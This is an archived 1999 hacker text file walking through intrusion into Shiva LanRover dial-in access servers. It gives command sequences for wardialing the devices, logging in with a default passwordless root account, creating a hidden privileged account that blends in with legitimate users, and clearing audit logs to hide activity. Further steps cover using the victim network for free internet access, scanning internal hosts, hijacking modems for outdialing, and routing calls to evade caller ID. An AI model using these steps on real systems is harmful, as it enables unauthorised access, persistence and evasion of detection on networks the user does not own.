TUCoPS :: General Information :: shiva.txt

Hacking the Shiva-LAN-Rover System

Hacking the Shiva-LAN-Rover System
By Hybrid (th0rn@coldmail.com)
April 1999

* Disclaimer:                                    *
*                                                *
* The information provided in this text file     *
* has been obtained from public domain resources *
* and is intended for educational use only.      *
*                                                *


1. Introduction
2. What can Shiva lan rovers do?
3. The command line
4. System security
5. PPP

1. Introduction

Shiva systems are becoming increasingly popular in the LAN networking world.
If like me you have done quite alot of scanning you would have come accross a
login prompt similar to this: [@ Userid:] If you have never seen this before,
take a look at some of the 9x scans at www2.dope.org/9x. In this file I am
going to fokus on the security strengths and weaknesses of the ShivaLanRover
networking system, and give a general overview of what can be done with such
systems. The Shiva system is a network security problem in it's own right, in
the sense that once you have gained access to one of these platforms, you
have the opotunity to explore the entire network on which the system is
based, in essance, you are on the trusted side of the firewall. If you would
like a copy of the ShivaLanRover software just FTP to ftp.shiva.com or get it
via the WWW.

To find a Shiva, the first thing you should do is dust off that old wardialer
program, and start scanning local or toll-free prefix assignments, if you
can't do this, you suck, go away. You will know when you have found a Shiva
when you are confronted with the following prompt:

@ Userid:

or if Radius authentification is enabled:

Starting Radius Authentification....
@ Userid:

Blah, ignore the radius authentification thing for now, it's just a lame
attempt to make the system look as if it has been secured, in most cases the
sysamin would have missconfigured the authentification and you will be
supprised as to how easy it is to get in. So you are at the login prompt,
what next? - As in most OS's Shivas have a nice set of default logins, so the
sysadmins poor setup is your gain. Try this: login: <root> pass: <NO PASS>.
The root login will work 9 times out of 10. The reason that the root account
works alot is beacuse in some cases the admin is not even aware the account
even exists! Most of the system setup is done via the main terminal, so the
admin does'nt have to login. the root account is not listed in the userfile
database, so most admin's overlook it. In some cases the admin would have set
up there own acount with somthing like <admin> <password> but if the admin
has any common sense you will not get in with that. Like most OS's, Shiva
systems have an audit log, so don't sit there trying to brute force anything,
once you are in, you can clear the system log, but more on that later. OK,
you've found a Shiva, you've loged on as <root> <no password>, now what? -
read on.

Once loged in, you will be droped into the Shiva command line prompt, which
should look somthing like this:

Shiva LanRover/8E, Patch 4.5.4p6 98/06/09  (Version and type of Shiva)
ShivaLanRover/8E# (The command prompt. Can be configured to say anything)

To get a list of the available commands type <help> or <?> this will reveal a
menu similar to this:

ShivaLanRover/8E# ? <enter>

alert                          Send text alert to all dial-in users
busy-out line <number>         Busy-out serial line modem
clear <keyword>                Reset part of the system
comment                        Enter a comment into the log
configure                      Enter a configuration session
connect <port pool>            Connect to a shared serial port
crashdump                      Write crashblock to log
disable                        Disable privileges
help                           List of available commands
initialize <keyword>           Reinitialize part of the system
lan-to-lan <keyword>           Manage LAN-to-LAN connections
passwd                         Change password
ping <IP host>                 Send ICMP echo to IP host
ppp                            Start a PPP session
quit                           Quit from shell
reboot                         Schedule reboot
show <keyword>                 Information commands, type "show ?" for list
slip                           Start a SLIP session
telnet <IP host>               Start a Telnet session
testline                       Test a line

The first thing you should do is check to see who is online, at the # prompt
use the show command to reveal the list of current online users:

ShivaLanRover/8E# show users <enter>

Line             User                     Activity  Idle/Limit    Up/Limit
   1             jsmith                      PPP       0/   10     0/ None
   2             root                        shell     0/   10     0/ None
Total users: 2

So here we see ourselves loged in on line 2, and a PPP user on line 1. Note
that most of the time users are not configured to be allowed remote dialin
PPP access, so the user jsmith is probably at a terminal on the LAN. Now you
can see who is online, ie- check the admin is not loged in. Now you need to
get a rough idea of the size of the system and it's network. At the # prompt

ShivaLanRover/8E# show lines <enter>

Async Lines:
Line State   Rate/P/Stop/   RA|DCD|DSR|DTR|RTS|CTS|Fr errs| Overruns|PErrs
   1 IDLE   57600/N/   1/     |OFF|ON |on |on |ON |      0|        0|   0
   2 CHAR   57600/N/   1/     |ON |ON |on |on |ON |      2|        0|   0
   3 IDLE   57600/N/   1/     |OFF|ON |on |on |ON |      0|        0|   0
   4 IDLE   57600/N/   1/     |OFF|ON |on |on |ON |      0|        0|   0
   5 IDLE   57600/N/   1/     |OFF|OFF|on |on |OFF|      0|        0|   0
   6 IDLE  115200/N/   1/     |OFF|ON |on |on |ON |      0|        0|   0
   7 IDLE   57600/N/   1/     |OFF|ON |on |on |ON |      0|        0|   0
   8 IDLE  115200/N/   1/     |OFF|ON |on |on |ON |      0|        0|   0

Here we see a list of the modem ports, as you can see it has 8, this is about
average for most Shiva systems. So now we know how many serial lines there
are, we need to get a rough idea as to how big the network itself is, to do
this type:

ShivaLanRover/8E# show arp <enter>

Protocol   Address            Age  Hardware Addr      Type    Interface
Internet       4m   x0-x0-B0-2x-Dx-78  ARPA    Ethernet:IP
Internet       4m   AA-0x-x4-00-0C-04  ARPA    Ethernet:IP
Internet       4m   Ax-00-04-0x-xD-x4  ARPA    Ethernet:IP
Internet       10m  AA-x0-04-00-0C-04  ARPA    Ethernet:IP
Internet      0m   AA-00-04-00-x1-04  ARPA    Ethernet:IP
Internet     4m   00-80-5x-31-F8-Ax  ARPA    Ethernet:IP
Internet     4m   00-80-5x-FE-C9-x8  ARPA    Ethernet:IP
Internet     0m   00-x0-A3-xF-21-C8  ARPA    Ethernet:IP
Internet      4m   00-x0-B0-01-36-3x  ARPA    Ethernet:IP

Showing the arp cache reveals some of the connected boxes to the LAN, aswell
as ethernet address, and type of protocol. Now we have established the kind
of system we are on, it's time to do some exploring, which is where I shall
begin this text file.

2. What can Shiva lan rovers do?

Shiva LanRover systems are very big security weaknesses if installed on any
network. The reason for this is that some of the default settings can be
easily overlooked by the admin. A Shiva system can be configured to provide
a wide variety of network services, some of which are listed here:

PPP (point-to-point protocol) This is the key to gaining access to the
network on which the Shiva is based upon, in most cases the network will have
an internal DNS server, and if you are lucky, the network which the system is
based will be connected to the internet. Hint hint, PPP, toll-free. But just
using a Shiva for free net access would be boring, which is why I am going to
discuss the other features of Shivas.

Modem Outdial. In alot of cases the system would have been configured to
allow modem outdialing which can be good for calling BBS's, diverting to
other dialups, scanning, but again, this is lame, just using a Shiva for
modem outdialing is boring, use your imagination. If you manage to get a PPP
connection, and the system is net connected, you could get online, and at the
same time call your favourite BBS. I'll explain how to do all of this later.

Telnet, ping, traceroute etc. These are the command line tools which will
enable you to determine whether the system is connected to the internet or
not. More on this later.

It's time to go into detail about all of the Shivas functions and commands, I
will concentrate on what you can do with root access, because that is the
only account you are likely to gain access to. 

3. The command line

When loged into the Shiva shell, you have the following commands at your

alert (Send text alert to all dial-in users) - Self explanitory.
busy-out uart <call-interface> (Busy-out UART port)
clear <keyword> (Reset part of the system)

The clear command is a nice feature of the Shiva system. The first thing you
should do when on a Shiva is make sure you erase all logs of your commands
and login times etc.. to do this all you need to do is type <clear log> This
will erase and reset the audit log, and also any invalid logins to the Shiva.
There are also other clear commands such as <clear arp> etc, but these will
all cause system problems and get you noticed, best leave this alone for the
time being.

comment (Enter a comment into the log)
configure (Enter a configuration session)

Heres the part where you can get the system to do what you want it to do, ie-
to get a PPP connection you will need to set up another account with shell
and PPP privalages. The root account does not allow PPP connections, so here
is where you will need to do your stuff. To get anywhere with a Shiva you
need to create a new account, using the config command you can create a new
user account with greater privalges than root. Before you make a new account
it is a good idea to see what kind of setup the other accounts have on the
system, you don't want to make an account that will stick out from the other
accounts, so type:

show security <enter> (this gives a list of the security configuration and
the user list.) you should see somthing like this:



Here we get a list of the configured users on the system. As you can see the
admin has made him/herself their own account, while other users have accounts
that allow logins via their terminals, but not remotely. In the above example
all the users have been assigned passwords, so it would be a good idea when
you make your own account to have one aswell. The idea is to make an account
that will blend in with the others and not look to obvious. The passwords in
the external user list are all 3DES (triple DES) encrypted. The type of user
account set up is determined by the options, such as jsmith=/di/do etc, more
on these functions in a bit. OK, now we need to set up our own account, to do
this we need to enter a configuration session, at the command line prompt
type: ShivaLanRover/8E# config <enter>

You will then drop into the configuration session.

Enter configuration file lines.  Edit using:
^X, ^U      clear line
^H, DEL     delete one character
^W          delete one word
^R          retype line
Start by entering section header in square brackets []
Finish by entering ^D or ^Z on a new line.

config> (here is where you enter the config commands, to make you own account
do the follwing)

config> [users]
config> username=/di/do/sh/tp/pw
config> ^D <------ (type control D to finish)

Review configuration changes [y/n]? y
New configuration parameters:
Modify the existing configuration [y/n]? y
You may need to reboot for all changed parameters to take effect.

You've just created your own user account which you can use for PPP
connections etc. To begin with your account is un-passworded, so when you log
back in just hit enter for your password, you can later change this. The /sh
part of the user configuration means you can remotely log into the command
shell, /pw means you have the ability to define your own password, if you
wanted to give yourself another root account, you would use the switch /rt.
In combination with the show config command you can also alter other system
configurations via this method, although it is a very good idea not to 
alter anything. Now your account has been set up, all you do is re-connect to
the system and login as your username, more on this later.

connect <PhoneGroup pool> (Connect to a serial port or modem)

This is another one of the good features of Shivas, you can remotely control
a series of modems on the system, and in alot of cases dialout. If you want
to call a BBS, note you cannot upload using Zmodem or similar protocols,
although you would be able to download, but expect a few CRC checksum errors.
To connect to a modem type: connect all_ports <enter> you will then drop into
one of the modem pools, as follows:

Connecting to Serial2 at 115200 BPS.
Escape character is CTRL-^ (30).
Type the escape character followed by C to get back,
or followed by ? to see other options.

(here basic modem commands are nessasary, use the follwing to dialout)

ATZ (initialise modem)
ATDTxxxxxxxxx (atdt then phone number) note in some cases the modem outdial
with be based upon the system PBX, so sometimes you will have to figure out
the outdialing code, which should be somthing simple like dialing a 9 before
the number you want to connect to. To disconnect from the outdialing session
type control C, or ^C. This will take you back to the command line. As with
the other system events, outdialing is loged into the audit file, along with
the number you called. It is generaly a good idea to clear the audit log
after things like PPP or dialout, again just type clear log <enter>.

cping <IP host> (Send continuous ICMP echoes to IP host)
crashdump (Write crashblock to log)
detect (Detect the configuration of an interface)
disable (Disable your root privaleges)
dmc <keyword> (Information commands, type "dmc ?" for list)

        down <slot> <firstmodem> (last Remove modems from CCB pool)
        info <slot> <modem> (Print info for specified modem)
        mupdate <slot> <firstmodem> (l Update Rockwell modem FW)
        state (Print state of a modem)
        status (Print status of all modems)
        trace (Trace message passing)
        up <slot> <firstmodem> (lastmo Add modems to CCB pool)
        test_1slot <slot> (Tests DMC card in slot specified)
        test_allcards (Tests all DMC cards found in system)
        test_golden <golden slot> (Tests all DMC cards against a Golden DMC)
        test_loopall <count 0-99> (Tests All DMC's for count)
        test_modempair <slot1> (modem1 Tests modems against each other)
        test_slotpair <slot1> <slot2> (Tests a DMC card against another)
        test_xmitloop <s> <m> <s> <m> (Tests modem pair for count)

help (List of available commands)
history (List of previous commands)
initialize <keyword> (Reinitialize part of the system)
l2f <keyword> (L2F commands)

        close <nickname> (Close tunnel to L2F HG)
        login (Start L2F session)
        tunnels (Show open tunnels)

lan-to-lan <keyword> (Manage LAN-to-LAN connections)
passwd (Change password)
ping <IP host> (Send ICMP echo to IP host)
ppp (Start a PPP session)
quit (Quit from shell)
reboot (Schedule reboot)
route <protocol> (Modify a protocol routing table)
rlogin <IP host> (Start an rlogin session)
show <keyword> (Information commands, type "show ?" for list)

account <keyword> (Accounting information)
arp (ARP cache)
bridge <keyword> (Bridging information)
buffers (Buffer usage)
configuration (Stored configuration, may specify sections)

the show config command will reveal all the system configuration setups,
includings DNS server information, security configurations, IP routing etc.
It will also show the internal IPs of radius authentification and TACAS

finger (Current user status)
interfaces [name1 [name2 ... ] (Interface information)
ip <keyword> (Internet Protocol information, type "show ip ?" for list)

To get an idea of the routing information, and again how big the network is
type, show ip route. This will bring up a routing table, and again give you
an idea as to where the connected boxes are, it is a good idea to note the IP

lan-to-lan (LAN-to-LAN connections)
license (Licensing information)
lines (Serial line information)
log (Log buffer)

The show log command will display the system audit log in more format. Here
you will be able to see what is going on on the system, ie- is it primarily
used for PPP, dialout etc. If users use the system for outdialing, you can
even see the numbers that they dial. Here is a cut down example as to what
you wiuld see in a system log file:

Mon 15 16:24:29 GMT 1998 4530  Serial4: "krad" logged in
00:01  4531  Serial4:PPP: Received LCP Code Reject for code 0D
00:01  4532  Serial4:PPP: Received PPP Protocol Reject for IPXCP (802B)
00:00  4533  Serial4:PPP:IP address xx.xx.xx.xx dest xx.xx.xx.xx bcast
00:00  4534  Serial4:PPP: IPCP layer up
00:04  4535  Serial4:PPP: CCP layer up
14:09  4536  Serial4:PPP: IPCP layer down
00:00  4537  Serial4:PPP: CCP layer down
00:00  4538  Serial4:PPP: LCP layer down
00:01  4539  Serial4:PPP: CD dropped on connection
00:00  4540  Serial4: "krad" logged out: user exit after 14:17 (Dial-In PPP,)
00:06  4541  Serial4: Rate 115200bps
00:00  4542  Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
00:01  4543  Serial4: Initialized modem
04:56  4544  setting time of day from real-time clock to Wed Nov 25 16:43:44
18:27  4545  Serial4: New Dial-In session
00:00  4546  Serial4:PPP: LCP layer up
00:00  4547  Serial4: "krad" logged in
00:01  4548  Serial4:PPP: Received LCP Code Reject for code 0C
00:00  4549  Dialin:IPX configured net 9823O049
00:00  4550  Serial4:PPP: IPXCP layer up
00:00  4670  Serial4: New Command Shell session
00:03  4671  Serial4: "root" logged in
01:38  4672  Serial4: "root" logged out: user exit after 01:42 (Command Shell)
00:06  4673  Serial4: Rate 115200bps
00:01  4674  Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
00:00  4675  Serial4: Initialized modem
55:11  4676  Could not parse IP SNMP request.

In the system log, you will also see invalid login attempts, error messages,
and general system events. Because the log file logs everything, it is a good
idea to erase your own presence in it.

modem <keyword> (Internal modem information, type "show modem ?" for list)
netbeui <keyword> (NetBeui information, type "show netbeui ?" for list)
novell <keyword> (NetWare information, type "show novell ?" for list)
ppp (PPP multilink bundles and links)
processes (Active system processes)
security (Internal userlist)
semaphores (Active system semaphores)
slot <keyword> (Internal serial slot information, type "show slot ?" for list)
upload (Upload information)
users (Current users of system)
version (General system information, also shows DNS info)
virtual-connections (Virtual Connection information)

slip (Start a SLIP session)
telnet <IP host> (Start a Telnet session)
tftp (Download new image, ie- system config files)
tunnel <IP host> (Start a Tunnel session)
wan [action] <wan interface> (Perform actions on WAN Interface)

4. System security

Shivas can be very weak on security, due to the exposed root account. If the
system is configured properly they can be very secure systems, although this
is usually not the case. There are many security options for the Shiva system
including Radius Authentification, SecurID, TACAS, and just the standard
secured login. In some cases an admin will use a secondary server to act as
the Radius Authentification. In this case, the setup would look somthing like

   [RADIUS Authentification Server]    } The server contains a secured user
      |                                  list, which will be used to verify
      |                                  login requests. The login is 
   [Router]                              determined if the user can be 
    |   |                                verified by the server.
    |   |                   } The Shiva sends the login request to RADIUS.
   [Shiva System]           } Starting Radius Authentification... @ Userid:

Sometimes a system will be configured to work with a number of different
Shivas on a network. For example, using the same idea as above, but without
the Radius server, a secondary shiva may be installed to act as the security
server, whereas all other Shiva systems refer to it for user login
verification. This can be a real bitch if you have loged into a system, but
the above setup has been implemented. For example, say you loged in as root,
and you want to set up a PPP account. The first thing you would do is check
to see what kind of setup existing users have by typing <show security> If
the verification server has been setup, there will be no users in the user
list, instead you have to find the network location of the verification
server, and hope it has an un-passworded root account on it. To find the
verification srever, or primary Shiva, just use the show config command. you
can then telnet from the Shiva you are on, to the Shiva displayed in the
config file, you should then get the @ Userid: login screen again, try root
no pass, if this does not work, it is possible to temorarily configure your
own server on the network, but this would mean other users will not be able
to login, so leave this alone. If you do manage to login to the server as
root, you have to setup your user account there, because that is where all
the Shivas on the network refer to in order to verify users, this way the
admin only has to maintain one user configuration file.

5. PPP

Once you have setup a user account with shell and PPP privaleges, you can
begin exploring the network on which the Shiva is based upon. If the network
is net connected you can get free net access aswell, but this is quite risky,
especially if the admin notices PPP sessions active at 4am, with destinations
such as irc.ais.net:6667. When you first establish a PPP connection to a
Shiva server, the first thing you should do is map out the network. To do
this just run a network, or port scanner accross the domain which the Shiva
is on. As on most networks, you are likely to come accross a variety of
different boxes, such as UNIX boxes, SunOS, shared printers, mail servers,
cisco routers, in one case someone I know found an Amiga box@$!. If the
network is net connected, it is a good idea to use your shell for any net
connections, such as IRC. Once you have an external net connection from a
Shiva it is also possible to similtaniously dialout accross the PSTN to a BBS
or any other system. To do this, you would have to find the network address
of the Shiva server you are on, then telnet back to it and re-login. using
the <connect all_ports> command will give you control over the system modems,
then you can dialout as if you where in terminal mode. If the Shiva you are
on is located on a toll-free number, or even local, it is not a good idea to
use it for net access, or stay on it for a long time. If you must use a Shiva
for net access, it is a good idea to use your PSTN routing skills, and not
dialup to the system directly. The mistake people make when it comes to ANI,
or CLID is that they think only 800 numbers have ANI, and residential numbers
have CLID. This is *wrong* the ANI service can be setup by anyone, it's a
choice, not a standard. If you want to route your call, the best thing to do
is route internationaly, so your origionating clid gets striped at intralata
boundarys on the PSTN. A technique, which I don't wanna give out involves
trunk and carrier hoping. We'll thats about it for this file, hope you
enjoyed it. If you want more information on the Shiva Lan Rover system, just
check out shiva.com, they will have technical guides in pdf format, you can
also download the shiva software from their ftp site.

Shouts to the following:

[9x] substance phriend siezer vectorx statd
     blotter knight network specialK microdot
     katkiller xramlrak bosplaya deadsoul and
     nino the 9x g1mp.

[b4b0] gr1p t1p. #9x #darkcyde Efnet.
backa xio.

[D4RKCYDE] downtime elf zomba force mortis
           angel dohboy brakis alphavax
           tonekilla bishopofhell sintax
           digitalfokus mistress.

Version: PGPfreeware 5.0i for non-commercial use
Comment: I Encrypt, Therefore I Am


* hybrid_blue@hotmail.com  | DSS: 0x5493F1307 *
* th0rn@coldmail.com       | D-H: 0x8B314ED9  *
* hybrid@darkcyde.org      | RSA: 0xA42A953D  *
* th0rn@cyberspace.org     |                  *
* www2.dope.org/9x         | 1999-02-09       *
* www.darkcyde.8m.com      |                  *

                    ___ ___ _____.___.____________________  ____________
hybrid@b4b0.org    /   |   \\__  |   |\______   \______   \/_   \______ \
hybrid@ninex.com  /    ~    \/   |   | |    |  _/|       _/ |   ||    |  \
hybrid.dtmf.org   \    Y    /\____   | |    |   \|    |   \ |   ||    `   \
----------------   \___|_  / / ______| |______  /|____|_  / |___/_______  /
                         \/  \/               \/        \/              \/

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH